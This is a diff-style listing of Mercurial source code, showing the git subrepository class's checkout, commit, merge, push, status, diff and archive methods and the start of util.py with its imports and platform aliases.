1596 self._gitcommand(['config', 'core.bare', 'false'])
1590 if self._gitstate() == revision:
1597 if self._gitstate() == revision:
1591 self._gitcommand(['reset', '--hard', 'HEAD'])
1598 self._gitcommand(['reset', '--hard', 'HEAD'])
1592 return
1599 return
1593 elif self._gitstate() == revision:
1600 elif self._gitstate() == revision:
1594 if overwrite:
1601 if overwrite:
1595 # first reset the index to unmark new files for commit, because
1602 # first reset the index to unmark new files for commit, because
1596 # reset --hard will otherwise throw away files added for commit,
1603 # reset --hard will otherwise throw away files added for commit,
1597 # not just unmark them.
1604 # not just unmark them.
1598 self._gitcommand(['reset', 'HEAD'])
1605 self._gitcommand(['reset', 'HEAD'])
1599 self._gitcommand(['reset', '--hard', 'HEAD'])
1606 self._gitcommand(['reset', '--hard', 'HEAD'])
1600 return
1607 return
1601 branch2rev, rev2branch = self._gitbranchmap()
1608 branch2rev, rev2branch = self._gitbranchmap()
1602
1609
1603 def checkout(args):
1610 def checkout(args):
1604 cmd = ['checkout']
1611 cmd = ['checkout']
1605 if overwrite:
1612 if overwrite:
1606 # first reset the index to unmark new files for commit, because
1613 # first reset the index to unmark new files for commit, because
1607 # the -f option will otherwise throw away files added for
1614 # the -f option will otherwise throw away files added for
1608 # commit, not just unmark them.
1615 # commit, not just unmark them.
1609 self._gitcommand(['reset', 'HEAD'])
1616 self._gitcommand(['reset', 'HEAD'])
1610 cmd.append('-f')
1617 cmd.append('-f')
1611 self._gitcommand(cmd + args)
1618 self._gitcommand(cmd + args)
1612 _sanitize(self.ui, self.wvfs, '.git')
1619 _sanitize(self.ui, self.wvfs, '.git')
1613
1620
1614 def rawcheckout():
1621 def rawcheckout():
1615 # no branch to checkout, check it out with no branch
1622 # no branch to checkout, check it out with no branch
1616 self.ui.warn(_('checking out detached HEAD in '
1623 self.ui.warn(_('checking out detached HEAD in '
1617 'subrepository "%s"\n') % self._relpath)
1624 'subrepository "%s"\n') % self._relpath)
1618 self.ui.warn(_('check out a git branch if you intend '
1625 self.ui.warn(_('check out a git branch if you intend '
1619 'to make changes\n'))
1626 'to make changes\n'))
1620 checkout(['-q', revision])
1627 checkout(['-q', revision])
1621
1628
1622 if revision not in rev2branch:
1629 if revision not in rev2branch:
1623 rawcheckout()
1630 rawcheckout()
1624 return
1631 return
1625 branches = rev2branch[revision]
1632 branches = rev2branch[revision]
1626 firstlocalbranch = None
1633 firstlocalbranch = None
1627 for b in branches:
1634 for b in branches:
1628 if b == 'refs/heads/master':
1635 if b == 'refs/heads/master':
1629 # master trumps all other branches
1636 # master trumps all other branches
1630 checkout(['refs/heads/master'])
1637 checkout(['refs/heads/master'])
1631 return
1638 return
1632 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1639 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1633 firstlocalbranch = b
1640 firstlocalbranch = b
1634 if firstlocalbranch:
1641 if firstlocalbranch:
1635 checkout([firstlocalbranch])
1642 checkout([firstlocalbranch])
1636 return
1643 return
1637
1644
1638 tracking = self._gittracking(branch2rev.keys())
1645 tracking = self._gittracking(branch2rev.keys())
1639 # choose a remote branch already tracked if possible
1646 # choose a remote branch already tracked if possible
1640 remote = branches[0]
1647 remote = branches[0]
1641 if remote not in tracking:
1648 if remote not in tracking:
1642 for b in branches:
1649 for b in branches:
1643 if b in tracking:
1650 if b in tracking:
1644 remote = b
1651 remote = b
1645 break
1652 break
1646
1653
1647 if remote not in tracking:
1654 if remote not in tracking:
1648 # create a new local tracking branch
1655 # create a new local tracking branch
1649 local = remote.split('/', 3)[3]
1656 local = remote.split('/', 3)[3]
1650 checkout(['-b', local, remote])
1657 checkout(['-b', local, remote])
1651 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1658 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1652 # When updating to a tracked remote branch,
1659 # When updating to a tracked remote branch,
1653 # if the local tracking branch is downstream of it,
1660 # if the local tracking branch is downstream of it,
1654 # a normal `git pull` would have performed a "fast-forward merge"
1661 # a normal `git pull` would have performed a "fast-forward merge"
1655 # which is equivalent to updating the local branch to the remote.
1662 # which is equivalent to updating the local branch to the remote.
1656 # Since we are only looking at branching at update, we need to
1663 # Since we are only looking at branching at update, we need to
1657 # detect this situation and perform this action lazily.
1664 # detect this situation and perform this action lazily.
1658 if tracking[remote] != self._gitcurrentbranch():
1665 if tracking[remote] != self._gitcurrentbranch():
1659 checkout([tracking[remote]])
1666 checkout([tracking[remote]])
1660 self._gitcommand(['merge', '--ff', remote])
1667 self._gitcommand(['merge', '--ff', remote])
1661 _sanitize(self.ui, self.wvfs, '.git')
1668 _sanitize(self.ui, self.wvfs, '.git')
1662 else:
1669 else:
1663 # a real merge would be required, just checkout the revision
1670 # a real merge would be required, just checkout the revision
1664 rawcheckout()
1671 rawcheckout()
1665
1672
1666 @annotatesubrepoerror
1673 @annotatesubrepoerror
1667 def commit(self, text, user, date):
1674 def commit(self, text, user, date):
1668 if self._gitmissing():
1675 if self._gitmissing():
1669 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1676 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1670 cmd = ['commit', '-a', '-m', text]
1677 cmd = ['commit', '-a', '-m', text]
1671 env = encoding.environ.copy()
1678 env = encoding.environ.copy()
1672 if user:
1679 if user:
1673 cmd += ['--author', user]
1680 cmd += ['--author', user]
1674 if date:
1681 if date:
1675 # git's date parser silently ignores when seconds < 1e9
1682 # git's date parser silently ignores when seconds < 1e9
1676 # convert to ISO8601
1683 # convert to ISO8601
1677 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1684 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1678 '%Y-%m-%dT%H:%M:%S %1%2')
1685 '%Y-%m-%dT%H:%M:%S %1%2')
1679 self._gitcommand(cmd, env=env)
1686 self._gitcommand(cmd, env=env)
1680 # make sure commit works otherwise HEAD might not exist under certain
1687 # make sure commit works otherwise HEAD might not exist under certain
1681 # circumstances
1688 # circumstances
1682 return self._gitstate()
1689 return self._gitstate()
1683
1690
1684 @annotatesubrepoerror
1691 @annotatesubrepoerror
1685 def merge(self, state):
1692 def merge(self, state):
1686 source, revision, kind = state
1693 source, revision, kind = state
1687 self._fetch(source, revision)
1694 self._fetch(source, revision)
1688 base = self._gitcommand(['merge-base', revision, self._state[1]])
1695 base = self._gitcommand(['merge-base', revision, self._state[1]])
1689 self._gitupdatestat()
1696 self._gitupdatestat()
1690 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1697 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1691
1698
1692 def mergefunc():
1699 def mergefunc():
1693 if base == revision:
1700 if base == revision:
1694 self.get(state) # fast forward merge
1701 self.get(state) # fast forward merge
1695 elif base != self._state[1]:
1702 elif base != self._state[1]:
1696 self._gitcommand(['merge', '--no-commit', revision])
1703 self._gitcommand(['merge', '--no-commit', revision])
1697 _sanitize(self.ui, self.wvfs, '.git')
1704 _sanitize(self.ui, self.wvfs, '.git')
1698
1705
1699 if self.dirty():
1706 if self.dirty():
1700 if self._gitstate() != revision:
1707 if self._gitstate() != revision:
1701 dirty = self._gitstate() == self._state[1] or code != 0
1708 dirty = self._gitstate() == self._state[1] or code != 0
1702 if _updateprompt(self.ui, self, dirty,
1709 if _updateprompt(self.ui, self, dirty,
1703 self._state[1][:7], revision[:7]):
1710 self._state[1][:7], revision[:7]):
1704 mergefunc()
1711 mergefunc()
1705 else:
1712 else:
1706 mergefunc()
1713 mergefunc()
1707
1714
1708 @annotatesubrepoerror
1715 @annotatesubrepoerror
1709 def push(self, opts):
1716 def push(self, opts):
1710 force = opts.get('force')
1717 force = opts.get('force')
1711
1718
1712 if not self._state[1]:
1719 if not self._state[1]:
1713 return True
1720 return True
1714 if self._gitmissing():
1721 if self._gitmissing():
1715 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1722 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1716 # if a branch in origin contains the revision, nothing to do
1723 # if a branch in origin contains the revision, nothing to do
1717 branch2rev, rev2branch = self._gitbranchmap()
1724 branch2rev, rev2branch = self._gitbranchmap()
1718 if self._state[1] in rev2branch:
1725 if self._state[1] in rev2branch:
1719 for b in rev2branch[self._state[1]]:
1726 for b in rev2branch[self._state[1]]:
1720 if b.startswith('refs/remotes/origin/'):
1727 if b.startswith('refs/remotes/origin/'):
1721 return True
1728 return True
1722 for b, revision in branch2rev.iteritems():
1729 for b, revision in branch2rev.iteritems():
1723 if b.startswith('refs/remotes/origin/'):
1730 if b.startswith('refs/remotes/origin/'):
1724 if self._gitisancestor(self._state[1], revision):
1731 if self._gitisancestor(self._state[1], revision):
1725 return True
1732 return True
1726 # otherwise, try to push the currently checked out branch
1733 # otherwise, try to push the currently checked out branch
1727 cmd = ['push']
1734 cmd = ['push']
1728 if force:
1735 if force:
1729 cmd.append('--force')
1736 cmd.append('--force')
1730
1737
1731 current = self._gitcurrentbranch()
1738 current = self._gitcurrentbranch()
1732 if current:
1739 if current:
1733 # determine if the current branch is even useful
1740 # determine if the current branch is even useful
1734 if not self._gitisancestor(self._state[1], current):
1741 if not self._gitisancestor(self._state[1], current):
1735 self.ui.warn(_('unrelated git branch checked out '
1742 self.ui.warn(_('unrelated git branch checked out '
1736 'in subrepository "%s"\n') % self._relpath)
1743 'in subrepository "%s"\n') % self._relpath)
1737 return False
1744 return False
1738 self.ui.status(_('pushing branch %s of subrepository "%s"\n') %
1745 self.ui.status(_('pushing branch %s of subrepository "%s"\n') %
1739 (current.split('/', 2)[2], self._relpath))
1746 (current.split('/', 2)[2], self._relpath))
1740 ret = self._gitdir(cmd + ['origin', current])
1747 ret = self._gitdir(cmd + ['origin', current])
1741 return ret[1] == 0
1748 return ret[1] == 0
1742 else:
1749 else:
1743 self.ui.warn(_('no branch checked out in subrepository "%s"\n'
1750 self.ui.warn(_('no branch checked out in subrepository "%s"\n'
1744 'cannot push revision %s\n') %
1751 'cannot push revision %s\n') %
1745 (self._relpath, self._state[1]))
1752 (self._relpath, self._state[1]))
1746 return False
1753 return False
1747
1754
1748 @annotatesubrepoerror
1755 @annotatesubrepoerror
1749 def add(self, ui, match, prefix, explicitonly, **opts):
1756 def add(self, ui, match, prefix, explicitonly, **opts):
1750 if self._gitmissing():
1757 if self._gitmissing():
1751 return []
1758 return []
1752
1759
1753 (modified, added, removed,
1760 (modified, added, removed,
1754 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1761 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1755 clean=True)
1762 clean=True)
1756
1763
1757 tracked = set()
1764 tracked = set()
1758 # dirstates 'amn' warn, 'r' is added again
1765 # dirstates 'amn' warn, 'r' is added again
1759 for l in (modified, added, deleted, clean):
1766 for l in (modified, added, deleted, clean):
1760 tracked.update(l)
1767 tracked.update(l)
1761
1768
1762 # Unknown files not of interest will be rejected by the matcher
1769 # Unknown files not of interest will be rejected by the matcher
1763 files = unknown
1770 files = unknown
1764 files.extend(match.files())
1771 files.extend(match.files())
1765
1772
1766 rejected = []
1773 rejected = []
1767
1774
1768 files = [f for f in sorted(set(files)) if match(f)]
1775 files = [f for f in sorted(set(files)) if match(f)]
1769 for f in files:
1776 for f in files:
1770 exact = match.exact(f)
1777 exact = match.exact(f)
1771 command = ["add"]
1778 command = ["add"]
1772 if exact:
1779 if exact:
1773 command.append("-f") #should be added, even if ignored
1780 command.append("-f") #should be added, even if ignored
1774 if ui.verbose or not exact:
1781 if ui.verbose or not exact:
1775 ui.status(_('adding %s\n') % match.rel(f))
1782 ui.status(_('adding %s\n') % match.rel(f))
1776
1783
1777 if f in tracked: # hg prints 'adding' even if already tracked
1784 if f in tracked: # hg prints 'adding' even if already tracked
1778 if exact:
1785 if exact:
1779 rejected.append(f)
1786 rejected.append(f)
1780 continue
1787 continue
1781 if not opts.get(r'dry_run'):
1788 if not opts.get(r'dry_run'):
1782 self._gitcommand(command + [f])
1789 self._gitcommand(command + [f])
1783
1790
1784 for f in rejected:
1791 for f in rejected:
1785 ui.warn(_("%s already tracked!\n") % match.abs(f))
1792 ui.warn(_("%s already tracked!\n") % match.abs(f))
1786
1793
1787 return rejected
1794 return rejected
1788
1795
1789 @annotatesubrepoerror
1796 @annotatesubrepoerror
1790 def remove(self):
1797 def remove(self):
1791 if self._gitmissing():
1798 if self._gitmissing():
1792 return
1799 return
1793 if self.dirty():
1800 if self.dirty():
1794 self.ui.warn(_('not removing repo %s because '
1801 self.ui.warn(_('not removing repo %s because '
1795 'it has changes.\n') % self._relpath)
1802 'it has changes.\n') % self._relpath)
1796 return
1803 return
1797 # we can't fully delete the repository as it may contain
1804 # we can't fully delete the repository as it may contain
1798 # local-only history
1805 # local-only history
1799 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1806 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1800 self._gitcommand(['config', 'core.bare', 'true'])
1807 self._gitcommand(['config', 'core.bare', 'true'])
1801 for f, kind in self.wvfs.readdir():
1808 for f, kind in self.wvfs.readdir():
1802 if f == '.git':
1809 if f == '.git':
1803 continue
1810 continue
1804 if kind == stat.S_IFDIR:
1811 if kind == stat.S_IFDIR:
1805 self.wvfs.rmtree(f)
1812 self.wvfs.rmtree(f)
1806 else:
1813 else:
1807 self.wvfs.unlink(f)
1814 self.wvfs.unlink(f)
1808
1815
1809 def archive(self, archiver, prefix, match=None, decode=True):
1816 def archive(self, archiver, prefix, match=None, decode=True):
1810 total = 0
1817 total = 0
1811 source, revision = self._state
1818 source, revision = self._state
1812 if not revision:
1819 if not revision:
1813 return total
1820 return total
1814 self._fetch(source, revision)
1821 self._fetch(source, revision)
1815
1822
1816 # Parse git's native archive command.
1823 # Parse git's native archive command.
1817 # This should be much faster than manually traversing the trees
1824 # This should be much faster than manually traversing the trees
1818 # and objects with many subprocess calls.
1825 # and objects with many subprocess calls.
1819 tarstream = self._gitcommand(['archive', revision], stream=True)
1826 tarstream = self._gitcommand(['archive', revision], stream=True)
1820 tar = tarfile.open(fileobj=tarstream, mode='r|')
1827 tar = tarfile.open(fileobj=tarstream, mode='r|')
1821 relpath = subrelpath(self)
1828 relpath = subrelpath(self)
1822 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1829 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1823 for i, info in enumerate(tar):
1830 for i, info in enumerate(tar):
1824 if info.isdir():
1831 if info.isdir():
1825 continue
1832 continue
1826 if match and not match(info.name):
1833 if match and not match(info.name):
1827 continue
1834 continue
1828 if info.issym():
1835 if info.issym():
1829 data = info.linkname
1836 data = info.linkname
1830 else:
1837 else:
1831 data = tar.extractfile(info).read()
1838 data = tar.extractfile(info).read()
1832 archiver.addfile(prefix + self._path + '/' + info.name,
1839 archiver.addfile(prefix + self._path + '/' + info.name,
1833 info.mode, info.issym(), data)
1840 info.mode, info.issym(), data)
1834 total += 1
1841 total += 1
1835 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1842 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1836 unit=_('files'))
1843 unit=_('files'))
1837 self.ui.progress(_('archiving (%s)') % relpath, None)
1844 self.ui.progress(_('archiving (%s)') % relpath, None)
1838 return total
1845 return total
1839
1846
1840
1847
1841 @annotatesubrepoerror
1848 @annotatesubrepoerror
1842 def cat(self, match, fm, fntemplate, prefix, **opts):
1849 def cat(self, match, fm, fntemplate, prefix, **opts):
1843 rev = self._state[1]
1850 rev = self._state[1]
1844 if match.anypats():
1851 if match.anypats():
1845 return 1 #No support for include/exclude yet
1852 return 1 #No support for include/exclude yet
1846
1853
1847 if not match.files():
1854 if not match.files():
1848 return 1
1855 return 1
1849
1856
1850 # TODO: add support for non-plain formatter (see cmdutil.cat())
1857 # TODO: add support for non-plain formatter (see cmdutil.cat())
1851 for f in match.files():
1858 for f in match.files():
1852 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1859 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1853 fp = cmdutil.makefileobj(self._subparent, fntemplate,
1860 fp = cmdutil.makefileobj(self._subparent, fntemplate,
1854 self._ctx.node(),
1861 self._ctx.node(),
1855 pathname=self.wvfs.reljoin(prefix, f))
1862 pathname=self.wvfs.reljoin(prefix, f))
1856 fp.write(output)
1863 fp.write(output)
1857 fp.close()
1864 fp.close()
1858 return 0
1865 return 0
1859
1866
1860
1867
1861 @annotatesubrepoerror
1868 @annotatesubrepoerror
1862 def status(self, rev2, **opts):
1869 def status(self, rev2, **opts):
1863 rev1 = self._state[1]
1870 rev1 = self._state[1]
1864 if self._gitmissing() or not rev1:
1871 if self._gitmissing() or not rev1:
1865 # if the repo is missing, return no results
1872 # if the repo is missing, return no results
1866 return scmutil.status([], [], [], [], [], [], [])
1873 return scmutil.status([], [], [], [], [], [], [])
1867 modified, added, removed = [], [], []
1874 modified, added, removed = [], [], []
1868 self._gitupdatestat()
1875 self._gitupdatestat()
1869 if rev2:
1876 if rev2:
1870 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1877 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1871 else:
1878 else:
1872 command = ['diff-index', '--no-renames', rev1]
1879 command = ['diff-index', '--no-renames', rev1]
1873 out = self._gitcommand(command)
1880 out = self._gitcommand(command)
1874 for line in out.split('\n'):
1881 for line in out.split('\n'):
1875 tab = line.find('\t')
1882 tab = line.find('\t')
1876 if tab == -1:
1883 if tab == -1:
1877 continue
1884 continue
1878 status, f = line[tab - 1], line[tab + 1:]
1885 status, f = line[tab - 1], line[tab + 1:]
1879 if status == 'M':
1886 if status == 'M':
1880 modified.append(f)
1887 modified.append(f)
1881 elif status == 'A':
1888 elif status == 'A':
1882 added.append(f)
1889 added.append(f)
1883 elif status == 'D':
1890 elif status == 'D':
1884 removed.append(f)
1891 removed.append(f)
1885
1892
1886 deleted, unknown, ignored, clean = [], [], [], []
1893 deleted, unknown, ignored, clean = [], [], [], []
1887
1894
1888 command = ['status', '--porcelain', '-z']
1895 command = ['status', '--porcelain', '-z']
1889 if opts.get(r'unknown'):
1896 if opts.get(r'unknown'):
1890 command += ['--untracked-files=all']
1897 command += ['--untracked-files=all']
1891 if opts.get(r'ignored'):
1898 if opts.get(r'ignored'):
1892 command += ['--ignored']
1899 command += ['--ignored']
1893 out = self._gitcommand(command)
1900 out = self._gitcommand(command)
1894
1901
1895 changedfiles = set()
1902 changedfiles = set()
1896 changedfiles.update(modified)
1903 changedfiles.update(modified)
1897 changedfiles.update(added)
1904 changedfiles.update(added)
1898 changedfiles.update(removed)
1905 changedfiles.update(removed)
1899 for line in out.split('\0'):
1906 for line in out.split('\0'):
1900 if not line:
1907 if not line:
1901 continue
1908 continue
1902 st = line[0:2]
1909 st = line[0:2]
1903 #moves and copies show 2 files on one line
1910 #moves and copies show 2 files on one line
1904 if line.find('\0') >= 0:
1911 if line.find('\0') >= 0:
1905 filename1, filename2 = line[3:].split('\0')
1912 filename1, filename2 = line[3:].split('\0')
1906 else:
1913 else:
1907 filename1 = line[3:]
1914 filename1 = line[3:]
1908 filename2 = None
1915 filename2 = None
1909
1916
1910 changedfiles.add(filename1)
1917 changedfiles.add(filename1)
1911 if filename2:
1918 if filename2:
1912 changedfiles.add(filename2)
1919 changedfiles.add(filename2)
1913
1920
1914 if st == '??':
1921 if st == '??':
1915 unknown.append(filename1)
1922 unknown.append(filename1)
1916 elif st == '!!':
1923 elif st == '!!':
1917 ignored.append(filename1)
1924 ignored.append(filename1)
1918
1925
1919 if opts.get(r'clean'):
1926 if opts.get(r'clean'):
1920 out = self._gitcommand(['ls-files'])
1927 out = self._gitcommand(['ls-files'])
1921 for f in out.split('\n'):
1928 for f in out.split('\n'):
1922 if not f in changedfiles:
1929 if not f in changedfiles:
1923 clean.append(f)
1930 clean.append(f)
1924
1931
1925 return scmutil.status(modified, added, removed, deleted,
1932 return scmutil.status(modified, added, removed, deleted,
1926 unknown, ignored, clean)
1933 unknown, ignored, clean)
1927
1934
1928 @annotatesubrepoerror
1935 @annotatesubrepoerror
1929 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1936 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1930 node1 = self._state[1]
1937 node1 = self._state[1]
1931 cmd = ['diff', '--no-renames']
1938 cmd = ['diff', '--no-renames']
1932 if opts[r'stat']:
1939 if opts[r'stat']:
1933 cmd.append('--stat')
1940 cmd.append('--stat')
1934 else:
1941 else:
1935 # for Git, this also implies '-p'
1942 # for Git, this also implies '-p'
1936 cmd.append('-U%d' % diffopts.context)
1943 cmd.append('-U%d' % diffopts.context)
1937
1944
1938 gitprefix = self.wvfs.reljoin(prefix, self._path)
1945 gitprefix = self.wvfs.reljoin(prefix, self._path)
1939
1946
1940 if diffopts.noprefix:
1947 if diffopts.noprefix:
1941 cmd.extend(['--src-prefix=%s/' % gitprefix,
1948 cmd.extend(['--src-prefix=%s/' % gitprefix,
1942 '--dst-prefix=%s/' % gitprefix])
1949 '--dst-prefix=%s/' % gitprefix])
1943 else:
1950 else:
1944 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1951 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1945 '--dst-prefix=b/%s/' % gitprefix])
1952 '--dst-prefix=b/%s/' % gitprefix])
1946
1953
1947 if diffopts.ignorews:
1954 if diffopts.ignorews:
1948 cmd.append('--ignore-all-space')
1955 cmd.append('--ignore-all-space')
1949 if diffopts.ignorewsamount:
1956 if diffopts.ignorewsamount:
1950 cmd.append('--ignore-space-change')
1957 cmd.append('--ignore-space-change')
1951 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1958 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1952 and diffopts.ignoreblanklines:
1959 and diffopts.ignoreblanklines:
1953 cmd.append('--ignore-blank-lines')
1960 cmd.append('--ignore-blank-lines')
1954
1961
1955 cmd.append(node1)
1962 cmd.append(node1)
1956 if node2:
1963 if node2:
1957 cmd.append(node2)
1964 cmd.append(node2)
1958
1965
1959 output = ""
1966 output = ""
1960 if match.always():
1967 if match.always():
1961 output += self._gitcommand(cmd) + '\n'
1968 output += self._gitcommand(cmd) + '\n'
1962 else:
1969 else:
1963 st = self.status(node2)[:3]
1970 st = self.status(node2)[:3]
1964 files = [f for sublist in st for f in sublist]
1971 files = [f for sublist in st for f in sublist]
1965 for f in files:
1972 for f in files:
1966 if match(f):
1973 if match(f):
1967 output += self._gitcommand(cmd + ['--', f]) + '\n'
1974 output += self._gitcommand(cmd + ['--', f]) + '\n'
1968
1975
1969 if output.strip():
1976 if output.strip():
1970 ui.write(output)
1977 ui.write(output)
1971
1978
1972 @annotatesubrepoerror
1979 @annotatesubrepoerror
1973 def revert(self, substate, *pats, **opts):
1980 def revert(self, substate, *pats, **opts):
1974 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1981 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1975 if not opts.get(r'no_backup'):
1982 if not opts.get(r'no_backup'):
1976 status = self.status(None)
1983 status = self.status(None)
1977 names = status.modified
1984 names = status.modified
1978 for name in names:
1985 for name in names:
1979 bakname = scmutil.origpath(self.ui, self._subparent, name)
1986 bakname = scmutil.origpath(self.ui, self._subparent, name)
1980 self.ui.note(_('saving current version of %s as %s\n') %
1987 self.ui.note(_('saving current version of %s as %s\n') %
1981 (name, bakname))
1988 (name, bakname))
1982 self.wvfs.rename(name, bakname)
1989 self.wvfs.rename(name, bakname)
1983
1990
1984 if not opts.get(r'dry_run'):
1991 if not opts.get(r'dry_run'):
1985 self.get(substate, overwrite=True)
1992 self.get(substate, overwrite=True)
1986 return []
1993 return []
1987
1994
1988 def shortid(self, revid):
1995 def shortid(self, revid):
1989 return revid[:7]
1996 return revid[:7]
1990
1997
1991 types = {
1998 types = {
1992 'hg': hgsubrepo,
1999 'hg': hgsubrepo,
1993 'svn': svnsubrepo,
2000 'svn': svnsubrepo,
1994 'git': gitsubrepo,
2001 'git': gitsubrepo,
1995 }
2002 }
@@ -1,3717 +1,3732 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import bz2
18 import bz2
19 import calendar
19 import calendar
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import datetime
23 import datetime
24 import errno
24 import errno
25 import gc
25 import gc
26 import hashlib
26 import hashlib
27 import imp
27 import imp
28 import os
28 import os
29 import platform as pyplatform
29 import platform as pyplatform
30 import re as remod
30 import re as remod
31 import shutil
31 import shutil
32 import signal
32 import signal
33 import socket
33 import socket
34 import stat
34 import stat
35 import string
35 import string
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import textwrap
39 import textwrap
40 import time
40 import time
41 import traceback
41 import traceback
42 import warnings
42 import warnings
43 import zlib
43 import zlib
44
44
45 from . import (
45 from . import (
46 encoding,
46 encoding,
47 error,
47 error,
48 i18n,
48 i18n,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 )
51 )
52
52
53 base85 = policy.importmod(r'base85')
53 base85 = policy.importmod(r'base85')
54 osutil = policy.importmod(r'osutil')
54 osutil = policy.importmod(r'osutil')
55 parsers = policy.importmod(r'parsers')
55 parsers = policy.importmod(r'parsers')
56
56
57 b85decode = base85.b85decode
57 b85decode = base85.b85decode
58 b85encode = base85.b85encode
58 b85encode = base85.b85encode
59
59
60 cookielib = pycompat.cookielib
60 cookielib = pycompat.cookielib
61 empty = pycompat.empty
61 empty = pycompat.empty
62 httplib = pycompat.httplib
62 httplib = pycompat.httplib
63 httpserver = pycompat.httpserver
63 httpserver = pycompat.httpserver
64 pickle = pycompat.pickle
64 pickle = pycompat.pickle
65 queue = pycompat.queue
65 queue = pycompat.queue
66 socketserver = pycompat.socketserver
66 socketserver = pycompat.socketserver
67 stderr = pycompat.stderr
67 stderr = pycompat.stderr
68 stdin = pycompat.stdin
68 stdin = pycompat.stdin
69 stdout = pycompat.stdout
69 stdout = pycompat.stdout
70 stringio = pycompat.stringio
70 stringio = pycompat.stringio
71 urlerr = pycompat.urlerr
71 urlerr = pycompat.urlerr
72 urlreq = pycompat.urlreq
72 urlreq = pycompat.urlreq
73 xmlrpclib = pycompat.xmlrpclib
73 xmlrpclib = pycompat.xmlrpclib
74
74
75 # workaround for win32mbcs
75 # workaround for win32mbcs
76 _filenamebytestr = pycompat.bytestr
76 _filenamebytestr = pycompat.bytestr
77
77
78 def isatty(fp):
78 def isatty(fp):
79 try:
79 try:
80 return fp.isatty()
80 return fp.isatty()
81 except AttributeError:
81 except AttributeError:
82 return False
82 return False
83
83
84 # glibc determines buffering on first write to stdout - if we replace a TTY
84 # glibc determines buffering on first write to stdout - if we replace a TTY
85 # destined stdout with a pipe destined stdout (e.g. pager), we want line
85 # destined stdout with a pipe destined stdout (e.g. pager), we want line
86 # buffering
86 # buffering
87 if isatty(stdout):
87 if isatty(stdout):
88 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
88 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
89
89
90 if pycompat.osname == 'nt':
90 if pycompat.osname == 'nt':
91 from . import windows as platform
91 from . import windows as platform
92 stdout = platform.winstdout(stdout)
92 stdout = platform.winstdout(stdout)
93 else:
93 else:
94 from . import posix as platform
94 from . import posix as platform
95
95
96 _ = i18n._
96 _ = i18n._
97
97
98 bindunixsocket = platform.bindunixsocket
98 bindunixsocket = platform.bindunixsocket
99 cachestat = platform.cachestat
99 cachestat = platform.cachestat
100 checkexec = platform.checkexec
100 checkexec = platform.checkexec
101 checklink = platform.checklink
101 checklink = platform.checklink
102 copymode = platform.copymode
102 copymode = platform.copymode
103 executablepath = platform.executablepath
103 executablepath = platform.executablepath
104 expandglobs = platform.expandglobs
104 expandglobs = platform.expandglobs
105 explainexit = platform.explainexit
105 explainexit = platform.explainexit
106 findexe = platform.findexe
106 findexe = platform.findexe
107 gethgcmd = platform.gethgcmd
107 gethgcmd = platform.gethgcmd
108 getuser = platform.getuser
108 getuser = platform.getuser
109 getpid = os.getpid
109 getpid = os.getpid
110 groupmembers = platform.groupmembers
110 groupmembers = platform.groupmembers
111 groupname = platform.groupname
111 groupname = platform.groupname
112 hidewindow = platform.hidewindow
112 hidewindow = platform.hidewindow
113 isexec = platform.isexec
113 isexec = platform.isexec
114 isowner = platform.isowner
114 isowner = platform.isowner
115 listdir = osutil.listdir
115 listdir = osutil.listdir
116 localpath = platform.localpath
116 localpath = platform.localpath
117 lookupreg = platform.lookupreg
117 lookupreg = platform.lookupreg
118 makedir = platform.makedir
118 makedir = platform.makedir
119 nlinks = platform.nlinks
119 nlinks = platform.nlinks
120 normpath = platform.normpath
120 normpath = platform.normpath
121 normcase = platform.normcase
121 normcase = platform.normcase
